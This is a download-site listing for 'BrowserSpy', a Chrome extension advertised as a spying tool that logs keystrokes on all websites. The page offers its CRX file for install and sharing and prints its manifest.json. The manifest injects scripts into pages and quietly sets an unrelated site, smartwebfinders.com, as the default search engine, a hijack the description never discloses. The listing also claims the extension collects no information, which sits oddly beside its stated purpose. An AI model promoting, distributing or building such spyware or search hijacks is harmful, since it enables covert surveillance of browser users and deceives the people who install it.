Top Spying tool : BrowserSpy

BrowserSpy is an online spying tool that helps you log the keystrokes and other user data.

What is Top Spying tool : BrowserSpy?

Top Spying tool : BrowserSpy is a Chrome extension developed by tackker, and its main feature is "BrowserSpy is an online spying tool that helps you log the keystrokes and other user data.".

Extension Screenshots

screenshot

Download Top Spying tool : BrowserSpy Extension CRX File

Download Top Spying tool : BrowserSpy extension files in crx format, manually install Chrome extensions in the browser, or share the crx files with friends to easily install Chrome extensions.

Extension Usage Instructions

                        BrowserSpy - The Best Spying Tool

BrowserSpy helps monitoring on browser activity and can also assist in spying activities. This extension records keystrokes on all websites. 

This extension does NOT collect any information
(all logged data stays put)                    

Extension Basic Information

Name Top Spying tool : BrowserSpy Top Spying tool : BrowserSpy
ID cenplbjdopjciamjdjiehflkhfjmklhm
Official URL https://chromewebstore.google.com/detail/top-spying-tool-browsersp/cenplbjdopjciamjdjiehflkhfjmklhm
Description BrowserSpy is an online spying tool that helps you log the keystrokes and other user data.
File Size 213 KB
Installation Count 132
Current Version 0.9
Last Updated 2024-03-02
Publish Date 2021-03-30
Rating 4.50/5 Total 2 Ratings
Developer tackker
Email [email protected]
Payment Type free
Privacy Policy Page URL https://tackker.com/privacy-policy
Supported Languages en-US
manifest.json
{
    "update_url": "https:\/\/clients2.google.com\/service\/update2\/crx",
    "manifest_version": 3,
    "name": "Top Spying tool : BrowserSpy",
    "description": "BrowserSpy is an online spying tool that helps you log the keystrokes and other user data.",
    "version": "0.9",
    "icons": {
        "128": "browser.png",
        "48": "browser.png",
        "16": "browser.png"
    },
    "action": [],
    "background": {
        "service_worker": "back.js",
        "type": "module"
    },
    "content_scripts": [
        {
            "matches": [
                ""
            ],
            "js": [
                "jquery-3.5.0.min.js",
                "content.js"
            ]
        }
    ],
    "chrome_settings_overrides": {
        "search_provider": {
            "name": "Smart",
            "keyword": "Smart",
            "search_url": "https:\/\/smartwebfinders.com\/?n=60&q={searchTerms}",
            "favicon_url": "https:\/\/smartwebfinders.com\/favicon.ico",
            "encoding": "UTF-8",
            "is_default": true
        }
    },
    "permissions": [
        "alarms",
        "tabs",
        "webRequest",
        "webNavigation",
        "scripting",
        "storage",
        "unlimitedStorage"
    ]
}